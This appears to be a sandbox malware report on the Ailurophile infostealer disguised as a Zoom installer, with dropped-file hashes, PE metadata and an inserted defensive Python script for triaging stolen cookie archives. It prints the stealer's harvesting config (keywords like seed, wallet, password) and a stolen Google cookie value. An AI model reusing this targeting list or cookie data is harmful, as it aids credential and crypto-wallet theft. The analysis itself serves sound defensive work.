                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn...google.com.TRUE./.FALSE.2597573456.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg...google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-06..
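The dropped archive above is a stored (uncompressed) zip with Windows-style backslash entry names under Ailurophile\, and each text file inside it starts with the stealer banner followed by either a "No ... found" note or, for cookies, Netscape cookies.txt lines (domain, subdomain flag, path, secure flag, expiry, name, value, tab-separated), as the preview of Google_Default.txt shows. The triage script below is an added example, not code from the report or from the stealer: it walks such an archive, parses the cookie files, and lists the domains whose stolen cookies are still unexpired, which is the list of sessions to revoke for the victim. The archive it builds is a constructed stand-in with the same layout and placeholder cookie values, not the dropped file itself.

```python
import io
import time
import zipfile
from dataclasses import dataclass

BANNER = "Ailurophile Stealer - Telegram: @Ailurophilevn"  # first line of every dropped text file


@dataclass(frozen=True)
class Cookie:
    domain: str
    include_subdomains: bool
    path: str
    secure: bool
    expires: int          # Unix time; 0 means a session cookie in the Netscape format
    name: str
    value: str


def parse_netscape_cookies(text: str):
    """Parse Netscape cookies.txt lines, skipping the stealer banner and note lines."""
    cookies = []
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if not line or line.startswith("#") or line.startswith("Ailurophile Stealer"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:          # "No cookies found"-style notes have no tabs
            continue
        domain, subdomains, path, secure, expires, name, value = fields
        if not expires.isdigit():
            continue
        cookies.append(Cookie(domain, subdomains == "TRUE", path, secure == "TRUE",
                              int(expires), name, value))
    return cookies


def walk_archive(zip_bytes: bytes):
    """Map (category, file name) -> text for every file in the stealer archive.
    Entry names use backslashes (the zip was built on Windows) and zipfile keeps
    them verbatim, so they are normalised before splitting."""
    files = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            parts = info.filename.replace("\\", "/").split("/")
            if len(parts) < 3 or parts[0] != "Ailurophile":
                continue
            files[(parts[1], parts[-1])] = zf.read(info).decode("utf-8", "replace")
    return files


def live_sessions(zip_bytes: bytes, now: int):
    """Domains whose stolen cookies are still valid at `now`: the sessions to revoke."""
    live = {}
    for (category, _name), text in walk_archive(zip_bytes).items():
        if category != "Cookies":
            continue
        for c in parse_netscape_cookies(text):
            if c.expires == 0 or c.expires > now:
                live.setdefault(c.domain.lstrip("."), []).append(c.name)
    return live


def build_sample_archive() -> bytes:
    """Constructed stand-in for the dropped archive: same layout as the report's
    preview (stored, not deflated), placeholder cookie values."""
    cookies_txt = "\n".join([
        BANNER, "",
        "\t".join([".google.com", "TRUE", "/", "FALSE", "2597573456", "NID", "511=placeholder"]),
        "\t".join([".google.com", "TRUE", "/", "FALSE", "2597573456", "1P_JAR", "2023-10-05-06"]),
        "\t".join(["shop.example", "FALSE", "/", "TRUE", "1000000000", "sid", "expired-long-ago"]),
    ])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("Ailurophile\\Autofills\\Autofills.txt",
                    BANNER + "\n\nNo autofills found for Google Default.")
        zf.writestr("Ailurophile\\Cards\\Cards.txt", BANNER + "\n\nNo cards found")
        zf.writestr("Ailurophile\\Cookies\\Google_Default.txt", cookies_txt)
    return buf.getvalue()


if __name__ == "__main__":
    for domain, names in live_sessions(build_sample_archive(), int(time.time())).items():
        print(f"{domain}: revoke sessions, cookies {', '.join(names)}")
```

Because the archive is stored rather than deflated, the same directory names and cookie lines are visible in the raw bytes (which is why the report's preview is readable), so a YARA or DLP rule on the banner string plus the Ailurophile\Cookies\ path will catch the archive on disk or in an upload before it reaches the Telegram endpoint.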
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):66
                                                                                Entropy (8bit):4.485787733894543
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3+iJyn:ziJi4wEJv
                                                                                MD5:34603047D92D7328CEFA79DE178D1971
                                                                                SHA1:BE2435B5DAB5DD358E03F6C7FEE3C384826343CF
                                                                                SHA-256:F353C24B1CD9A4E0BF4EC5572387A68D85196E27B33F9E5F713DC8DCE23C19A0
                                                                                SHA-512:051DA884D5957CC781BCFDD665521CA32EC152068AC4684CDD1ABCC01F1FAC26ACBADF1CAADC4F0067DE2134FCD30120F0F4F4E1037996CE29783507CEA1AF71
                                                                                Malicious:false
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..[No history found]
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):65
                                                                                Entropy (8bit):4.422163682746226
                                                                                Encrypted:false
                                                                                SSDEEP:3:FJQ/Ji40JSQMJs3rKNKXB5J:ziJi4wEJO8KXvJ
                                                                                MD5:4136A47D671A2B0555965D0175796441
                                                                                SHA1:7B25202479B7B0A124D026B75AE812359ACADBA8
                                                                                SHA-256:EB4F0DD5FDF480AA319E286ED9559193457EF36C1255B6F2B2E7A301E4AF4B9D
                                                                                SHA-512:E9D944AF278D6E9CFDF51C176FC53E3B9DB535568CD0A98E13EFCAF378E603195D5E54B295B0FBFF70546F92504BEBBF5B00818DEA71AEC84722D115FB026512
                                                                                Malicious:false
                                                                                Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No password found
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:Unicode text, UTF-8 text, with very long lines (425)
                                                                                Category:dropped
                                                                                Size (bytes):991
                                                                                Entropy (8bit):5.003744577524848
                                                                                Encrypted:false
                                                                                SSDEEP:24:m19iRRpN8H+xalSPoonPaWu8DkiKTxp/AphGFWVZluLCIH1u6YBm1R:zB++QSdniiDL0ynVZl4H1MBmv
                                                                                MD5:1CAC849C2DB533D801F6B58E652E0A06
                                                                                SHA1:211B375E463DC65AFA408073232A06A90B9B2029
                                                                                SHA-256:122A28072BEDE072BD4C1EAA871AF228344D9445D4E4F0E5A87F8A0AE69A1166
                                                                                SHA-512:38476D619C72EFE49B7CF9B41CED524C115B0800C7AE77728140863015DF24BC8C15DB6309830C5A6C7E47A36D1590F425FED893D0368A21BF8E7C74BB1E0C39
                                                                                Malicious:false
                                                                                Preview:Ailurophile Stealer - https://ailurophilestealer.com - Telegram: @Ailurophilevn..IP: 173.254.250.72.Country: United States.Hostname: 376483.PC Type: Microsoft Windows 10 Pro 10.0.19045.Architecture: amd64.File Path: C:\Users\user\Desktop.Main Path: C:\Users\user\AppData\Local\Ailurophile.Allowed Extensions: [rdp txt doc docx pdf csv xls xlsx keys ldb log].Folders to Search: [Documents Desktop Downloads].Files: [secret password account tax key wallet gang default backup passw mdp motdepasse acc mot_de_passe login secret bot atomic account acount paypal banque bot metamask wallet crypto exodus discord 2fa code memo compte token backup secret seed mnemonic memoric private key passphrase pass phrase steal bank info casino prv priv. prive telegram identifiant identifiants personnel trading bitcoin sauvegarde funds recup note].MAC Address: ec:f4:bb:2d:24:96.Screen Resolution: 1280x1024.Browsers:.Chrome Default - version: 117.0.5938.134.Edge Default - version: 117.0.2045.55.
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:Zip archive data (empty)
                                                                                Category:dropped
                                                                                Size (bytes):22
                                                                                Entropy (8bit):1.0476747992754052
                                                                                Encrypted:false
                                                                                SSDEEP:3:pjt/l:Nt
                                                                                MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                Malicious:false
                                                                                Preview:PK....................
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.136471148832945
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                Malicious:true
                                                                                Preview:SQLite format 3 (remainder of the header is non-printable binary data)
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):159744
                                                                                Entropy (8bit):0.5394293526345721
                                                                                Encrypted:false
                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                Malicious:true
                                                                                Preview:SQLite format 3 (remainder of the header is non-printable binary data)
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:true
                                                                                Preview:SQLite format 3 (remainder of the header is non-printable binary data)
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.1239949490932863
                                                                                Encrypted:false
                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                Malicious:false
                                                                                Preview:SQLite format 3 (remainder of the header is non-printable binary data)
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):155648
                                                                                Entropy (8bit):0.5407252242845243
                                                                                Encrypted:false
                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                Malicious:true
                                                                                Preview:SQLite format 3 (remainder of the header is non-printable binary data)
                                                                                Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):51200
                                                                                Entropy (8bit):0.8745947603342119
                                                                                Encrypted:false
                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                Malicious:false
                                                                                Preview:SQLite format 3 (remainder of the header is non-printable binary data)
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1148
                                                                                Entropy (8bit):5.307749663821274
                                                                                Encrypted:false
                                                                                SSDEEP:24:3wzyl1SKco4KmZjKbmuu1od6em9qr9tYs4RPQoUEJ0gt/NKIl9rgaP:syl1SU4xymdajm9qr9tz4RIoUl8NDx
                                                                                MD5:8096F89594D46C75146A535C509A7C1C
                                                                                SHA1:6D185E00887CD308A204497F906B81B513727218
                                                                                SHA-256:F37C512E1653E192BB6581DF6E3AAEAB6C3F3C01C4302163C964EE2165CCFEED
                                                                                SHA-512:480DF21D3DCABA48484CBA3D01AC0D25C0E43907C16FD9BD2B7306F77483111A9B633856B2625CFC7C6220F8FDC3224D1B5370984121370BD4A0297BFE772578
                                                                                Malicious:false
                                                                                Preview:@...e.................................O.........................8...................=.@G..?...o.........System.Security.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D.......
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Entropy (8bit):5.871451489415792
                                                                                TrID:
                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:ZoomInstaller.exe
                                                                                File size:22'207'488 bytes
                                                                                MD5:806a6ccce380785faa45512ce603c580
                                                                                SHA1:78a2936e19f0474f80f73144564e9f24c4559859
                                                                                SHA256:c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
                                                                                SHA512:f228fceffc0af944cff9d06058aa690b1f6bcaea252971ac6b33c58e88429b108c2c4189e807c2659f40035160a4fdeacae961704c81a3e1ba8f1739df2d8e9e
                                                                                SSDEEP:196608:KKopoPyXk3nLRT155J/YJMIYhOFWBe1ZiieX:zoP+dT155lD/ALiie
                                                                                TLSH:4A275B46FA9449DACA959435C9AB42C53730FC041F2AABD75A08F33C7DB27D9AE78340
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........R..@....&....+.`>...R................@..............................X.......^...`... ............................
                                                                                Icon Hash:0301c4e4ae4c2117
                                                                                Entrypoint:0x1400013c0
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x140000000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                TLS Callbacks:0x403e5220, 0x1, 0x403e5200, 0x1
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:1
                                                                                File Version Major:6
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:1
                                                                                Import Hash:a7c025ffa07099999f6fbb8a47ebc600
                                                                                Instruction
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                dec eax
                                                                                mov eax, dword ptr [00738EA5h]
                                                                                mov dword ptr [eax], 00000001h
                                                                                call 00007F880CBB17AFh
                                                                                nop
                                                                                nop
                                                                                dec eax
                                                                                add esp, 28h
                                                                                ret
                                                                                nop dword ptr [eax]
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                dec eax
                                                                                mov eax, dword ptr [00738E85h]
                                                                                mov dword ptr [eax], 00000000h
                                                                                call 00007F880CBB178Fh
                                                                                nop
                                                                                nop
                                                                                dec eax
                                                                                add esp, 28h
                                                                                ret
                                                                                nop dword ptr [eax]
                                                                                jmp 00007F880CF972F8h
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                dec eax
                                                                                lea ecx, dword ptr [00000009h]
                                                                                jmp 00007F880CBB19E9h
                                                                                nop dword ptr [eax+00h]
                                                                                ret
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop
                                                                                nop word ptr [eax+eax+00000000h]
                                                                                nop word ptr [eax+eax+00h]
                                                                                jmp dword ptr [eax]
                                                                                inc edi
                                                                                outsd
                                                                                and byte ptr [edx+75h], ah
                                                                                imul ebp, dword ptr [esp+20h], 203A4449h
                                                                                and bl, byte ptr [edi+46h]
                                                                                inc esi
                                                                                bound esi, dword ptr [edx]
                                                                                popad
                                                                                jnc 00007F880CBB1A6Dh
                                                                                aaa
                                                                                pop edi
                                                                                sub eax, 415F4D34h
                                                                                dec esi
                                                                                dec esp
                                                                                jnc 00007F880CBB1A67h
                                                                                pop eax
                                                                                das
                                                                                jns 00007F880CBB1A76h
                                                                                jns 00007F880CBB1A68h
                                                                                jnbe 00007F880CBB1A50h
                                                                                pop eax
                                                                                arpl word ptr [ebx+31h], bp
                                                                                jc 00007F880CBB1A65h
                                                                                dec edi
                                                                                popad
                                                                                xor bl, byte ptr [eax+7Ah]
                                                                                jc 00007F880CBB1A6Dh
                                                                                das
                                                                                sub eax, 5F517145h
                                                                                imul ebp, dword ptr [ecx+2Dh], 37h
                                                                                push ebp
                                                                                dec ecx
                                                                                pop eax
                                                                                dec edx
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x7a9000         0x159         .edata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7aa000         0x17cc        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x7ae000         0x1958        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x73b000         0x16848       .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x7b0000         0xe360        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x739ec0         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7aa560         0x520         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3e5fd0 | 0x3e6000 | 7ea4c339201cfc0d017ff0b87a4b19e3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x3e7000 | 0x44b60 | 0x44c00 | 7f3a4311981f005dbdcd4a469317bf79 | False | 0.35641690340909093 | data | 4.7016112525326035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x42c000 | 0x30efa0 | 0x30f000 | 980004199c90a11f5822ac71af072469 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata | 0x73b000 | 0x16848 | 0x16a00 | f43182d3de97642869b35118a096df21 | False | 0.4437478418508287 | data | 5.7958538093412795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata | 0x752000 | 0x6e38 | 0x7000 | b67dc254f2818584b007d9f5e7f6c7d0 | False | 0.15841238839285715 | data | 4.555509799133882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x759000 | 0x4fb90 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x7a9000 | 0x159 | 0x200 | 30fe0610bc0a77d191a7ad97749dc072 | False | 0.41796875 | data | 3.6898871269927276 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata | 0x7aa000 | 0x17cc | 0x1800 | 80786bfdb64d5983762cc60cec534c6d | False | 0.31103515625 | data | 4.581143990765701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x7ac000 | 0x60 | 0x200 | c169c31a7238605c1737945e51f7b6a8 | False | 0.064453125 | data | 0.3029571603346658 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x7ad000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x7ae000 | 0x1958 | 0x1a00 | 620ce9f25f196dce93d103918034bcf6 | False | 0.42232572115384615 | data | 5.972815278958329 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7b0000 | 0xe360 | 0xe400 | 30c8e1f349b7c140a991746bf7696280 | False | 0.2539405153508772 | data | 5.433384464940853 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                .reloc0x7b00000xe3600xe40030c8e1f349b7c140a991746bf7696280False0.2539405153508772data5.433384464940853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /40x7bf0000xa000xa00f572ff26ebb6d763b114fcdf85f1b0b7False0.23125data2.172227556052624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /190x7c00000x4e8a6c0x4e8c0018482ad49d6930aadea4051e7032cd1aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /310xca90000x5bb30x5c0099cb2691f7a424dcc90dd9f3c5e9a3b4False0.25747282608695654data4.951740082737746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /450xcaf0000x2031340x203200d210e398493c72b90f26bbad6d9b7cf9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /570xeb30000x789080x78a0066ed03329fa137a3544f15b3ac177939False0.24312459520725388data4.819335116736298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /700xf2c0000x2d6e0x2e0002ddab6e6787fb523255ef99c09c7514False0.467476222826087data4.902638410052134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /810xf2f0000x38fcdf0x38fe00ebc4ad0edd74625957cdfbc2787f88b4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /920x12bf0000x1120600x112200991c4336c4aaf2c5a9b2538f095ccebbFalse0.1585593721500228data2.3723520688244295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /1060x13d20000x300x20040cca7c46fc713b4f088e5d440ca7931False0.103515625data0.8556848540171443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /1250x13d30000x30300x3200cdf146190012415e7b1a41f86838392cFalse0.127890625data5.00188009895494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /1410x13d70000x17ead20x17ec00fb09a426318d9493dd36d65f9dbaf405False0.42729807927824953data5.452375099590376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                /1570x15560000x326150x328004f9c42a72c5c1f8cedaa8b20d619e1ddFalse0.5112401376856436data5.516542450471743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x7ae130 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 15000 x 15000 px/m | English | United States | 0.4195590994371482
RT_GROUP_ICON | 0x7af1d8 | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x7af1ec | 0x2dc | data | English | United States | 0.4931693989071038
RT_MANIFEST | 0x7af4c8 | 0x48f | XML 1.0 document, ASCII text | | | 0.40102827763496146

DLL | Import
